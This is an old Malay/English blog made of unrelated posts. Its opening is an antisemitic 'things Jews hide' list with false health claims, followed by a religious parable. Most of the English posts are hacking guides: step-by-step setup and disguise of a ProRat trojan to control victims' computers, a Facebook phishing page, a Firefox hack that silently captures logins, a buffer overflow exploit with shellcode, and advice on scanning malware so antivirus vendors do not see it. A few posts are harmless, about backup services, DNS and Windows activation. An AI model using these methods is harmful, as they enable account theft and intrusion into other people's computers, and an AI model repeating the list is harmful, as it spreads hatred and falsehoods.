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Thursday, October 20, 2011


10 perkara yahudi taknak kita tahu!

Tahukah korang sebenarnya banyak benda yang yahudi laknat ni sembunyikan pada pe...ngetahuan umum. Jom MK nak dedahkan 10 daripadanya!

1) Israel merupakan salah satu pembekal rokok terbesar dunia, namun rakyatnya tidak digalakkan menghisap rokok yang mereka cipta kerana mereka tahu akan bahana dalam kandungannya!.

2) Israel mempunyai kepakaran dalam mencipta vaksin dan mahir dalam ilmu perubatan, namun ilmu itu hanya untuk orang luar, kerana mereka tahu bahan kimia yang terdapat dalam ubat akan merosakkan untuk satu jangka masa panjang. Penduduk israel sendiri menggunakan Habbatus Sauda dalam perubatan harian.

3) Taktik kaum ibu di Israel ketika mengandung ialah si ibu/ isteri akan mendengar si suami membaca, menyanyi atau mereka akan menyelesaikan masalah matematik bersama-sama untuk mendapat bayi yang bijak dan petah kerana pada ketika ini fikiran dan perasaan si isteri adalah bersambungan dengan anak dalam kandungan berbanding anda bercakap padanya di perut.

4) McDonald di israel telah membuat pengubahsuaian contohnya dari segi minuman. Mereka menggantikan kopi berkafein kepada teh yang mengandungi polyphenols, iaitu unsur kimia yang berfungsi sebagai antioksidan berkekuatan besar untuk membuang sel rosak dan mencegah kanser. Kita disini masih lagi menggunakan KAFEIN BERBAHAYA!

5) Di Israel, mereka akan memakan buah-buahan dahulu sebelum memakan makanan utama. Ini kerana hakikatnya dengan memakan hidangan kabohidrat (nasi atau roti) dahulu kemudian buah buahan akan menyebabkan kita merasa ngantuk dan lemah dan payah untuk memahami pelajaran disekolah. Sedangkan disini kita dimomokkan dengan memakan buah-buahan sebagai pencuci mulut.

6) Israel terus melakukan berbagai usaha untuk menghancurkan Masjid Al Aqsha dan Qubah Shakhrah sejak 50 tahun yang lalu dengan menggali bawah tanah masjid tersebut agar runtuh dengan sendirinya?

7) Majoriti buku sejarah di dunia mengatakan Negara-negara Arab yang menyerang Israel terlebih dahulu pada perang tahun 1967? Padahal faktanya, Israel yang menyerang Negara-negara Arab terlebih dahulu kemudian mereka merebut kota Al Quds dan Tebing Barat? Tetapi mereka mengatakan serangannya itu adalah serangan untuk menjaga diri dan antisipasi?

8 ) Di Palestin, penduduk kristian Palestin dan Palestin Muslim bersatu melawan penjajah yahudi

9) Pelajar-pelajar di sekolah dilatih dengan taktik ketenteraan dalam bersukan seperti menembak dan mamanah bagi melatih otak memfokus sesuatu perkara dan mempersiapkan diri jika perkhidmatan diperlukan dimasa akan datang.

10) Hosni Mubarak merupakan tulang belakang Israel dan Amerika selama 30 tahun!



Terdapat seorang pemuda yang kerjanya menggali kubur dan m...encuri kain kafan untuk dijual. Pada suatu hari, pemuda tersebut berjumpa dengan seorang ahli ibadah untuk menyatakan kekesalannya dan keinginan untuk bertaubat kepada Allah s. w. t. Dia berkata, "Sepanjang aku menggali kubur untuk mencuri kain kafan, aku telah melihat 7 perkara ganjil yang menimpa mayat-mayat tersebut. Lantaran aku merasa sangat insaf atas perbuatanku yang sangat keji itu dan ingin sekali bertaubat."

" Golongan yang pertama, aku lihat mayat yang pada siang harinya menghadap kiblat. Tetapi pabila aku menggali semula kuburnya pada waktu malam, aku lihat wajahnya telahpun membelakangkan kiblat. Mengapa terjadi begitu, wahai tuan guru?" tanya pemuda itu. " Wahai anak muda, mereka itulah golongan yang telah mensyirikkan Allah s. w. t. sewaktu hidupnya. Lantaran Allah s. w. t. menghinakan mereka dengan memalingkan wajah mereka dari mengadap kiblat, bagi membezakan mereka daripada golongan muslim yang lain," jawab ahli ibadah tersebut.

Sambung pemuda itu lagi, " Golongan yang kedua, aku lihat wajah mereka sangat elok semasa mereka dimasukkan ke dalam liang lahad. Tatkala malam hari ketika aku menggali kubur mereka, ku lihat wajah mereka telahpun bertukar menjadi babi. Mengapa begitu halnya, wahai tuan guru?" Jawab ahli ibadah tersebut, " Wahai anak muda, mereka itulah golongan yang meremehkan dan meninggalkan solat sewaktu hidupnya. Sesungguhnya solat merupakan amalan yang pertama sekali dihisab. Jika sempurna solat, maka sempurnalah amalan-amalan kita yang lain,"

Pemuda itu menyambung lagi, " Wahai tuan guru, golongan yang ketiga yang aku lihat, pada waktu siang mayatnya kelihatan seperti biasa sahaja. Apabila aku menggali kuburnya pada waktu malam, ku lihat perutnya terlalu gelembung, keluar pula ulat yang terlalu banyak daripada perutnya itu." " Mereka itulah golongan yang gemar memakan harta yang haram, wahai anak muda," balas ahli ibadah itu lagi.

" Golongan keempat, ku lihat mayat yang jasadnya bertukar menjadi batu bulat yang hitam warnanya. Mengapa terjadi begitu, wahai tuan guru?" Jawab ahli ibadah itu, " Wahai pemuda, itulah golongan manusia yang derhaka kepada kedua ibu bapanya sewaktu hayatnya. Sesungguhnya Allah s. w. t. sama sekali tidak redha kepada manusia yang menderhakai ibu bapanya."

" Golongan kelima, ku lihat ada pula mayat yang kukunya amat panjang, hingga membelit-belit seluruh tubuhnya dan keluar segala isi dari tubuh badannya," sambung pemuda itu. " Anak muda, mereka itulah golongan yang gemar memutuskan silaturrahim. Semasa hidupnya mereka suka memulakan pertengkaran dan tidak bertegur sapa lebih daripada 3 hari. Bukankah Rasulullah s. a. w. pernah bersabda, bahawa sesiapa yang tidak bertegur sapa melebihi 3 hari bukanlah termasuk dalam golongan umat baginda," jelas ahli ibadah tersebut.

" Wahai guru, golongan yang keenam yang aku lihat, sewaktu siangnya lahadnya kering kontang. Tatkala malam ketika aku menggali semula kubur itu, ku lihat mayat tersebut terapung dan lahadnya dipenuhi air hitam yang amat busuk baunya," " Wahai pemuda, itulah golongan yang memakan harta riba sewaktu hayatnya," jawab ahli ibadah tadi.

" Wahai guru, golongan yang terakhir yang aku lihat, mayatnya sentiasa tersenyum dan berseri-seri pula wajahnya. Mengapa demikian halnya wahai tuan guru?" tanya pemuda itu lagi. Jawab ahli ibadah tersebut, " Wahai pemuda, mereka itulah golongan manusia yang berilmu. Dan mereka beramal pula dengan ilmunya sewaktu hayat mereka. Inilah golongan yang beroleh keredhaan dan kemuliaan di sisi Allah s. w. t. baik sewaktu hayatnya mahupun sesudah matinya."

Ingatlah, sesungguhnya daripada Allah s. w. t kita datang dan kepadaNya jualah kita akan kembali. Kita akan dipertanggungjawabkan atas setiap amal yang kita lakukan, hatta amalan sebesar zarah. Wallahua'lam..

Tuesday, June 28, 2011

13 Free online backup and file sharing service

13 Free online backup and file sharing service

If you are trying to get around the attachment size limits in email or simply want store your files off your computer to make sure that if disaster struck there is a backup copy stored somewhere else, there are a handful of free and paid services that make it easy to host your private files.

These online space can typically be accessed via web browser or a dedicated program. Besides your backup copy, if you move between computers or travel, you will also be able to get access to your precious files from anywhere with an internet connexion.

Dropbox: Dropbox will give you 2GB of free online storage space for your files. offers a great deal of customization, such as password protected file sharing, and choosing how long you want your files to be available.

Adrive: Adrive offers a huge 1 Terabyte of data storage to paying customers. Free accounts get a genereous 50GB of storage space online.

Syncplicity: Free users get 2GB of online space to store their files. They have business options available as well.

Wuala: With Wuala you need to offer part of your hard disk to store other people’s files and in exchange you can store your files on their computer. Everything is then encrypted and the files distributed accross multiple computers.

Online data backup storage and sharing

MediaMax iDrive: Free 2GB onlie storage space, encryption is used for data transfers between your computer and MediaMax servers.

SpiderOak: This free online backup gives you 2GB of space, and it works with Windows Mac OS X and Linux.

Mozy: At Mozy you get 2GB of free online backup space. Like all the other services paid for larger storage space is available.

ZumoDrive: Online backup storage space for your photos, music and documents. Zumodrive gives you 2GB of storage space for free.

MyOherDrive: Receive 2GB of free online backup storage. It also allows file sharing of your files through links.
Backupify: It supports online backup of WordPress, Google docs, Picasa, Gmail, Flickr and many more. Free plan gives you 2GB of storage space.

SugarSync: The free 2GB of data storage online has some limitations but still good value for money

Fabrik: Currently only works in Windows as it needs you to download a backup client, but this will allow you to schedule backups. Frabrik gives you 2GB of online storage for free.

All of these services encrypt the data transfer from your computer to their servers, but some of them will not use encryption for storage. If you need a really secure encrypted storage data backup, to which not even the company can have access, then consider Secure Backup.

Secure Backup: Not free but it will store your data encrypted using AES256 bit, and not even the company can access it without your password which only you know and can not be retrieved by them.


How to check if a program is infected

How to check if a program is infected

Hello all users heres some easy ways to find out if a program is infected or not without having to run the program. We know some of them you have already known.


Wikipedia describes a sandbox as: 'a security mechanism for safely running programs. It is often used to execute untested code, or untrusted programs from unverified third-parties, suppliers and untrusted users.' and this is exactly what it is.

A sandbox is an isolated work-space on a harddisk in which programs can be run without fear of infecting your PC.
Do you need to download a sandbox? No, in fact, I advise you use 'Anubis Sandbox', a free online sandbox. You upload your file to anubis, it runs it and tells you exactly what it does.

Anubis Sandbox

2. Vmware (most effective)

What is vmware? 'VM' stands for 'Virtual Machine', a virtual machine is an operating system complete with virtual hardware which runs on another operating system. An example of this is me running two Windows XP operating systems on one computer at the same time with the use of a vmware-based program. This means, we can run whatever we want in my second virtual Windows XP as it will not effect the rest of our PC.
A good free vmware program is 'Microsoft Virtual PC'.

For more information on vmware and how to use it, PM me.

3. Multi-Scanners

Disclaimer: Never use any legitimate multi-scanners (such as virus total or jotti's malware scan) to scan programs you have crypted, packed, joined or created yourself as many of them then send the program to anti-virus companies which then add it to their signature dates.

Multi-scanners such as Virus Total, Jotti's malware scan and KIMS, scan a single program with multiple anti-viruses to see if any detect them as malware. This does NOT mean the program is definantly infected but does increase the chances (many hack tools are detected as malware when they are in fact not).

To scan crypted, packed, joined or home-made malware, ONLY use underground multi-scanners such as 'KIMS'.


A Brief Intro To Password Cracking

A Brief Intro To Password Cracking

What is Password Cracking?

Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system.The purpose of password cracking might be to help a user recover a forgotten password , to gain unauthorized access to a system, or as a preventive measure by system administrators to check for easily crackable passwords.

What are the Common Methods?

1. Guessing

Easy Passwords can be sometimes guessed by people. These include most common passwords like The persons name, D.O.B, QWERTY, 123456, etc.

2. Bruteforcing

Many password cracker use this method to crack passwords. This method involves a software repeatedly trying out different combinations for logging into the system (or account).

3. Dictionary Attack

This method involves use of long lists of commonly used password lists or Username:Password combos or Wordlists for assisting Bruteforce. The software uses the data provided in this Sheet (text) to login to the system.

4. Social Engineering

This method involves interaction with the slave (or so told yet to be slave). In this method the Hacker asks the person many questions casually in a mindset to make him blurt out his password or atleast give a clue of it.

Suggestions to Prevent your password from getting cracked

* Using Alphabets , Numerals , Symbols in your passwords.
* Encrypting your passwords with Hashes like MD5.
* Installing a Captcha to stop bots.

These are a just few common methods.

Tools Required to Crack Passwords

Password Cracking Softwares:

Ultimate Password List (Dictionary)


What Is Buffer Overflow Attack (TUT)

What Is Buffer Overflow Attack (TUT)

A Buffer Overflow is a flaw by which a program reacts abnormally when the memory buffers are overloaded, hence writing over adjacent memory. It can be triggered by using inputs that may alter the way a program operates,for example inputting a very large value in a c program which does integer based addition.
A buffer overflow can lead to program crash, memory access error, garbage outputs & worse, breach of system security. Probably, you might have seen prominent buffer overflow based exploits & attacks in Metaspl0it or any other spl0it framework. Why I am writing this ? well..I found an excellent article on buffer overflow by eXeCuTeR & thought you might wanna have a look at it. Its exlplained in quite easy language with very basic example.
read & learn..

Our vuln program:

---------- bof.c --------------


int main(int argc, char *argv[])
char str[10];
strcpy(str, argv[1]);

return 0;

---------- bof.c --------------

As you see, argv[1] is copied to str (str can contains 10 characters)
Try to think - What happens when we load more than 10 bytes on str? You'll see.

Lets try compile the program and load 12 bytes:

niv@niv-desktop:~/Desktop$ gcc-3.3 bof.c -o bof
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x12'`

The program has been successfully compiled even though we loaded 12 bytes, which means 12 bytes aren't enough to overflow the program.

Lets try to overflow the program with 14 bytes:

niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x14'`

Failed. Again.

Lets load 32 bytes this time:

niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x32'`
Segmentation fault (core dumped)

In case it says: /*** stack smashing detected ***/ or something that appears to be like this error, just go to the terminal, type: sudo apt-get install gcc-3.3 and when compiling it type gcc-3.3 example.c -o example instead of gcc example.c -o example.

We made it, we overflowed the program.

Now we'll check more further what exactly happend:

niv@niv-desktop:~/Desktop$ gdb -c core ./bof
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/tls/i686/cmov/".
/home/niv/Desktop/core: No such file or directory.
(gdb) run `perl -e 'print "A"x60'`
Starting program: /home/niv/Desktop/bof `perl -e 'print "A"x32'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r eip
eip 0x41414141 0x41414141

We overwrited the EIP with A's (A = 41 in hex) - The EIP is the Instructor Pointer, it points at the next instruction.

Now we can start writing our exploit.
Our exploit is gonna contain the NOPSLED + Shellcode + the address of the shellcode (the RET).
The NOPSLED is a chain of 0x90's (NOPSLED = NO OPeration) so the NOPSLED will be placed before our shellcode.
The NOPSLED helps us so we don't have to jump exactly to the place in memory where our shellcode begins.

---------- exploit.c --------------

char exploit[2048];

int main(void)
int i;
* (linux/x86) eject cd-rom (follows "/dev/cdrom" symlink) + exit() - 40 bytes
* - izik
char shellcode[] =
"\x6a\x05" // push $0x5
"\x58" // pop %eax
"\x31\xc9" // xor %ecx,%ecx
"\x51" // push %ecx
"\xb5\x08" // mov $0x8,%ch
"\x68\x64\x72\x6f\x6d" // push $0x6d6f7264
"\x68\x65\x76\x2f\x63" // push $0x632f7665
"\x68\x2f\x2f\x2f\x64" // push $0x642f2f2f
"\x89\xe3" // mov %esp,%ebx
"\xcd\x80" // int $0x80
"\x89\xc3" // mov %eax,%ebx
"\xb0\x36" // mov $0x36,%al
"\x66\xb9\x09\x53" // mov $0x5309,%cx
"\xcd\x80" // int $0x80
"\x40" // inc %eax
"\xcd\x80"; // int $0x80

for(i = 0; i < 512; i++)
strcat(exploit, "0x90");

strcat(exploit, shellcode);


return 0;
---------- exploit.c --------------

niv@niv-desktop:~/Desktop$ gcc-3.3 exploit.c -o exploit
niv@niv-desktop:~/Desktop$ ./exploit

Run our vuln program so we could find the RET, the address of our shellcode.
After we run it, we'll look for the ESP - the ESP points on the last element used on the stack.
Check this out:

niv@niv-desktop:~/Desktop$ gcc-3.3 exploit.c -o exploit
niv@niv-desktop:~/Desktop$ ./exploit
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x60'`
Segmentation fault (core dumped)
niv@niv-desktop:~/Desktop$ gdb -c core ./bof
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/tls/i686/cmov/".
/home/niv/Desktop/core: No such file or directory.
(gdb) run `perl -e 'print "A"x60'`
Starting program: /home/niv/Desktop/bof `perl -e 'print "A"x60'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x/s $esp

You're gonna get these things:

0xbf949694: "`???}_???o??\002"
0xbf9496a2: ""

Keep searching until you see something like this thing:


0xbf9496e0 is the address of our shellcode (the RET)
To make our exploit work properly, we need to overwrite the EIP with our shellcode.We'll take our old address (0xbf9496e0) and do this thing:

Take our address and make it look this way: bf 94 96 e0
Grab the last bytes (e0) and do the following:
we'll block the characters between \'s (slashes), add x in each block -> \xe0\
you'll do the same to each 2 chars and then put them in order that the last bytes of our the address will be the first one in our new address:

0xbf9496e0 -> \xe0\x96\x94\xbf

Now, we are gonna reach our shellcode this way:
Since we overflowed the program with 32 bytes (32 A's),
and our RET's length is 4 bytes we are gonna subtract the length of our shellcode address(the RET) of the A's,
and we are gonna print 28 A's (32 A's - 4 bytes (RET's length) = 28) and the RET so we could reach the shellcode successfully.

niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x28'``printf

I suppose you already understood what's about to happen if you have read the exploit :)


How Windows Product Activation Works

How Windows Product Activation Works

Windows Product Activation or WPA is a license validation procedure introduced by Microsoft Corporation in all versions of it’s Windows operating system. WPA was first introduced in Windows XP and continues to exist in Windows Server 2003, Windows Vista, Windows Server 2008 and Windows 7 as well.

WPA enforces each end user to activate their copy of Windows so as to prevent unauthorized usage beyond the specific period of time until it is verified as genuine by Microsoft. How WPA really works was a closely guarded secret until GmbH analyzed WPA using a copy of Windows XP RC1 and published a paper on their findings.

In this post you will find answers to some of the most frequently asked questions about Windows Product Activation.

Why activation?

Microsoft’s intention behind the activation is to limit the usage of it’s Windows operating system to only one machine for which the retail license is issued. Any other computer which runs on the same license must be disallowed from using the software. Thus WPA demands for activation of the product within 30 days of it’s installation so as to ensure that it is genuine.

What does “Genuine Windows” means?

The copy of Windows is said to be genuine only if the product key used during the installation is genuine. It means that a given product key (retail license) must be used to install Windows only on one computer for which the license was purchased. Thus if the same key is used for the installation on another computer, then it is said to be a pirated copy.

Exactly what information is transmitted during the activation?

When you activate your copy of Windows you are transmitting an Installation ID code to the Microsoft either by phone or Internet depending on the method you choose to activate. Based on this, the Microsoft’s licensing system can determine whether or not the installed OS is genuine. If it is said to be genuine, then the system will receive the Activation ID which completes the activation process. If the activation is done via telephone then the Activation ID needs to be entered manually to complete the activation process.

What information does the Installation ID contain?

This Installation ID is a 50-digit number which is derived from the following two data.

1. Product ID – It is actually derived from the 25-digit product key (the alphanumeric value that is printed on the sticker over the Windows CD/DVD case) that is entered during the installation of the operating system. The Product ID is used to uniquely identify your copy of Windows.

2. Hardware ID – This value is derived based on the hardware configuration of your computer.

The WPA system checks the following 10 categories of the computer hardware to derive the Hardware ID:

* Display Adapter
* SCSI Adapter
* IDE Adapter (effectively the motherboard)
* Network Adapter (NIC) and its MAC Address
* RAM Amount Range (i.e., 0-64mb, 64-128mb, etc.)
* Processor Type
* Processor Serial Number
* Hard Drive Device
* Hard Drive Volume Serial Number (VSN)

Thus the Installation ID which is a combination of Product ID and Hardware ID is finally derived and sent to Microsoft during the activation process.

How is the Installation ID validated?

The Installation ID needs to be validated to confirm the authenticity of the installed copy of Windows. So after the Installation ID is received by Microsoft, it is decoded back so as to obtain the actual product key and the hardware details of the computer involved in the activation process.

The Microsoft’s system will now look to see if this is the first time the product key is being used for the activation. This happens when the user is trying to activate his Windows for the first time after purchase. If this is the case then the Installation ID is validated and the corresponding Activation ID is issued which completes the activation process.

However Microsoft system will now associate this product key with the hardware ID of the computer and stores this information on their servers. In simple words, during the first use of the product key, it is paired together with the Hardware ID and this information is stored up on the Microsoft servers.

What if a computer running a pirated copy of Windows attempts to activate?

The activation fails whenever the copy of Windows installed is not said to be genuine. This usually happens when the product key used for the installation is said to have been used earlier on a different computer. This is determined during the activation process as follows:

During the validation of the Installation ID, the Microsoft’s system checks to see if the same product key was used in any of the previous activation processes. If yes then it looks to see the Hardware ID associated with it. The computer running a pirated copy of Windows will obviously have a different hardware configuration and hence the Hardware ID will mismatch. In this case the activation process will fail.

Thus for a successful activation, either of the following two cases must be satisfied:

1. The product key must have been used for the first time. ie: The product key should not have been used for earlier activations on any other computer.

2. If the product key is said to have been used earlier, then the Hardware ID should match. This happens only if the same computer for which the license was genuinely purchased is attempting for subsequent activation.

What about formatting the hard disk?

Each time the hard disk is reformatted and Windows is re-installed, it needs to be re-activated. However the activation process will be completed smoothly since the same computer is attempting for subsequent activation. In this case both the product key and the Hardware ID will match and hence the activation becomes successful.

What is I upgrade or make changes to my hardware?

In the above mentioned 10 categories of hardware, at least 7 should be the same. Thus you are allowed to make changes to not more than 3 categories of hardware. If you make too many changes then your activation will fail. In this case, it is necessary to contact the customer service representative via phone and explain about your problem. If he is convinced he may re-issue a new product key for your computer using which you can re-activate your Windows.

Some things WPA does not do

* WPA does not send any personal information at all about you to Microsoft. There is still an option to register the product with Microsoft, but that is separate and entirely voluntary.
* If you prefer to activate via phone, you are not required to give any personal information to Microsoft.
* WPA does not provide a means for Microsoft to turn off your machine or damage your data/hardware. (Nor do they even have access to your data). This is a common myth that many people have about Microsoft products.
* WPA is not a “lease” system requiring more payments after two years or any other period. You may use the product as licensed in perpetuity.


Hack any e-mail account password

Hack any e-mail account password

1) First of all Download ProRat

Once it is downloaded right click on the folder and choose to extract it. A password prompt will come up. The password will be "pro".

2) Open up the program. You should see the following:

3) Next we will create the ProRat Trojan server. Click on the "Create" button in the bottom. Choose "Create ProRat Server".

4) Next put in your IP address so the server could connect to you. If you don’t know your IP address click on the little arrow to have it filled in for you automatically. Next put in your e-mail so that when and if a victim gets infected it will send you a message. We will not be using the rest of the options.

5) Now Open General settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager.

Here is a quick overview of what they mean and which should be checked:

6) Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. Remember a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to. A good suggestion is a picture or an ordinary text document because that is a small file and its easier to send to the people you need.

7) Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I prefer using .exe files, because it is cryptable and has icon support, but exe’s looks suspicious so it would be smart to change it.

8) Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is. For my example I will choose the regular text document icon since my file is a text document.

9) After this, press Create server, your server will be in the same folder as ProRat. A new file with name "binded_server" will be created. Rename this file to something describing the picture. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out so he could get people to download it.

Very important: Do not open the "binded_server" file on your system.

10) You can send this trojan server via email, pendrive or if you have physical access to the system, go and run the file. You can not send this file via email as "server.exe", because it will be detected as trojan or virus. Password protect this file with ZIP and then email it. Once your victim download this ZIP file, ask him to unlock it using ZIP password. When the victim will double click on the file, he will be in your control.

11) Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next.

Once the victim runs the server on his computer, the trojan will be installed onto his computer in the background. The hacker would then get a message telling him that the victim was infected. He would then connect to his computer by typing in his IP address, port and clicking Connect. He will be asked for the password that he made when he created the server. Once he types it in, he will be connected to the victims computer and have full control over it.

12) Now the hacker has a lot of options to choose from as you can see on the right. He has access to all victim's computer files, he can shut down his pc, get all the saved passwords off his computer, send a message to his computer, format his whole hard drive, take a screen shot of his computer, and so much more. Below I’ll show you a few examples.

13) The image below shows the message that the victim would get on his screen if the hacker chose to message him.

14) Below is an image of the victims task bar after the hacker clicks on Hide Start Button.

15) Below is an image of what the hacker would see if he chose to take a screen shot of the victims screen.

As you saw in the above example, a hacker can do a lot of silly things or a lot of damage to the victim. ProRat is a very well known trojan so if the victim has an anti-virus program installed he most likely won’t get infected. Many skilled hackers can program their own viruses and Trojans that can easily bypass anti-virus programs.

Do you have questions, comments, or suggestions? Feel free to post a comment!


Friday, June 24, 2011

Hack Firefox To Auto Save Passwords Without Notification

Hack Firefox To Auto Save Passwords Without Notification

Hi all users,

Here is a short tutorial on how to get firefox to save usernames + passwords automatically with any notifications (Sort of like a keylogger) just by editing 1 of the javascript files.

ideal if you want to get someones login details who uses your computer.

1) First you need to close firefox.

2) Now locate the nsloginmanagerprompter.js which is normally found in

3) Open nsloginmanagerprompter.js with notepad ++

4) Replace the entire line 804 to 869 with the following code

var pwmgr = this._pwmgr;

When you've done that "save as" to your desktop, then drag back in to the original folder and replace the file.

Now your done go into firefox and try it out.. Smile

To see the usernames + passwords you need to click on tools at the top of your browser and go to page info then security.

They will be saved into the saved passwords section.


See The Passwords Behind Asterisk !

See The Passwords Behind Asterisk !

Hello all users,

I am going to show you in a short tutorial how to read out a password of a web browser.


Password: **

What's my password?

Alright, now you could read out the *** stuff with a simple javascript code.

javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j

All you need is to copy & paste it in the URL-address bar.


Thursday, June 23, 2011

Windows Unsolved Mysteries

Windows Unsolved Mysteries

Hi users, today we will share a few cool and mysterious things. Hope you all like this article . Here are some of the unsolved mysterious things involving the worlds most used OS "Windows" .One day i got a mail stating that......

Nobody can create a FOLDER anywhere on the computer which can be named as “CON”.This is something pretty cool…and unbelievable… At Microsoft the whole Team, including Bill Gates, couldn’t answer why this happened!

This is not the first time I listen about this funny question that "why we can't create a folder with name 'CON' , and I’m sure most of you also try to make folder "CON" just now after reading the title of article ! if no,then go and 1st try it .... If you try creating a folder named CON, as the mail claims, it’ll get renamed automatically to New Folder. But there is no mystery behind this, and the team at Microsoft very well knows the reason for this. :-)

Why is it not possible to create a folder named CON ?

Before we proceed further, let us tell you a small secret you can’t even create a folder named PRN, AUX, NUL and many others.

The reason you can’t create a folder with these names is because these are reserved keywords used by DOS. The below screen-shot taken from Microsoft’s website shows a list of reserved keywords in DOS.

If you try creating a folder with any of these names, the name automatically changes back to the default “New Folder”. And this is what has caused the confusion. Instead of automatically renaming the folder, had an explanatory warning message popped up.

Here are Some of the Other Mysteries

1.Go to notepad and type Bush hid the facts. After which, save your work anywhere
with any name and close notepad. Then re-open notepad and open your previously
saved file and look what appears.

2.Open Microsoft Word then type: =rand (200, 99) and press ENTER. By now
I bet you’re seeing something strange that not even Bill Gates and his team can explain.

Bush trying these things… haha

Are these things telling us something, or are they just bugs of the old tycoon named Windows?


How to hack a Facebook Account Using a Fake login Page

Hack a Facebook Account Using a Fake login Page

Today i will teach you how to make a Fake login page (phisher) to Hack Facebook account Follow the steps given below to Hack a facebook account.

Hack a Facebook Account Using a Fake login Page :

1. First a fall we need a fake login page (fake.html), login.php You can download both the files from Here

2. Now open login.php which we downloaded earlier with a note pad and press (ctrl+ f )
and search for the term and replace it with the site address
where you want the victim to be redirected and save it

Note : This a very important step redirect the victim to a proper site other wise the victim will get suspicious .In our case we are making fake facebook login page so its better to redirect the victim to

3. Now create a account in Free web hosting site like , or

4. Now upload both the files (fake.html , login.php ) to your directory .Now send the
fake.html link to your victim

Example :-

5. Now when the victim clicks the link and enters all the information in our fake login
page and click login He will be redirected to site which we did in step 3

6. Now to see the victims id ,password login to your account " " where
you can see a newfile "password.txt" open it .Now you can see the userid
and the password of the victim

This a simple but a very effective method of Hacking a facebook account
.If you have any doubts please be free to comment


Enable Registry Editor Disabled By Admin

Enable Registry Editor Disabled By Admin

Hi all users here is solution if an administrator has disabled the registry editor on his/her computer. First of all Open Notepad and copy paste the following text to the note pad


Save the text file as any name u with extension .reg

example:- "enable.reg"

After that double click to run the file


Easily Share Large Files Directly Pc To Pc Using Web Browser Without Uploading Anywhere

Easily Share Large Files Directly PC To PC Using Web Browser Without Uploading Anywhere

FilesOverMiles is a tool for direct file sharing, fast and secure way to send files over the Internet. No setup or sign up and the file transfers are not stored anywhere. It will appeal to many professionals who want to share files securely and efficiently.

Step 1 : Go to FilesOverMiles website. Click "Browse" and select the file to transfer.

Step 2 : As soon as you select the file, the site will generate an unique URL which you have to share with the user to want to send the file to.

Step 3 (2nd User) : The PC on the receiving end of this file transfer must go this unique url which will show a download option from the file to be transferred PC to PC.

Note : The transfer file will continue to be available for download until the web page on 1st user’s browser is closed.

This way you can securely transfer files of any size through one pc to another from your browser. No need to upload anywhere.

Intro To Google DNS IP & How To Set Up DNS Server?

Intro To Google DNS IP & How To Set Up DNS Server?

Google Public DNS is a free public DNS resolution service that promises to further speed up the internet.

What is Google DNS IP

Google DNS IP are IP addresses provided by Google. DNS Addresses are like Address Book, when you enter the website URL, it resolves the DNS by looking into the address book. The faster they resolve the faster is the loading speed. The primary and secondary IP address are and respectively.

Set up Google DNS on the computer

Setting up DNS server is quite easy, the procedures below are for Windows 7. Open Network and Sharing center, click Change Adapter Setting from the left sidebar, right-click the local area network or wireless network and select Properties.

Now from the Local Area Connection Properties dialog box, select TCP/IPv4 and click Properties. Now select ‘Use the following DNS Server addresses’ and enter the primary and secondary Google DNS IP addresses.

If you want to configure in the router so that everyone can benefit from it, open the router dashboard, find the option that asks for DNS Server addresses and enter the Google DNS Server addresses(i.e, and It’s that simple.

Some users are reluctant to add the Google DNS addresses citing privacy concerns. Google can keep track of what every user is doing, thus breaching the privacy of users. But if you want faster speed irrespective of privacy concerns, you can give it a shot.


How to Protect Your Email Id and Facebook from Hackers

How to Protect Your Email Id and Facebook from Hackers

Everybody use email accounts and social networking websites such as orkut, twitter and facebook. There are many important information of a person in these email accounts and social networking website. so it is important to protect these account from hackers. Because hackers always try to get others account to get those secret and personal data for bad purpose. If use your email id for business and other services then it's a great loss and trouble for you. So always try to be safe from hackers

Follow these simple steps i am writing below to protect yourself from being hacked.

  • Never share your password to anyone.
  • Don't use password as your nick name, phone no. or pet names..
  • Use the combination of lower case, upper case, numbers and special characters for passwords.
  • Never click on any suspected link comes in a mail from unknown sender.
  • Never give your passwords to any 3rd party websites for any service.
  • Use different passwords for different accounts.
  • Check the website url every time before login. EX: check url to be before login to face account. Never login to website such as (MOST IMPORTANT)
  • Use secondary email address and mobile phone numbers with secret questions for account recovery.
  • Never use any javascript code in url while login to any of your email or any other website account. It may be a cookie stealer script.
  • Use latest antivirus and antimalware softwares with firewall on.

These are some steps which you can follow for safe surfing over the internet.

Don't give any chance to hackers...

Better Way To Protect Your Website from Hackers

Better Way To Protect Your Website from Hackers

Hackers are ethical testers to find faults in systems so they can be corrected before unethical hackers (crackers) exploit them. So, this is really about how to protect your website from crackers.

Keep your files up to date

If your site uses the popular SendMail script, please be sure your version is a current one. Visit Anti-Spam Provisions in Sendmail 8.8 to edit the FormMail script. We have the updated SendMail in use for the Harley Shopping Cart site. FormMail is another popular script used to send form results to an email address or database. We use that file for our website form. These scripts are located in the cgi-bin on the web host server.

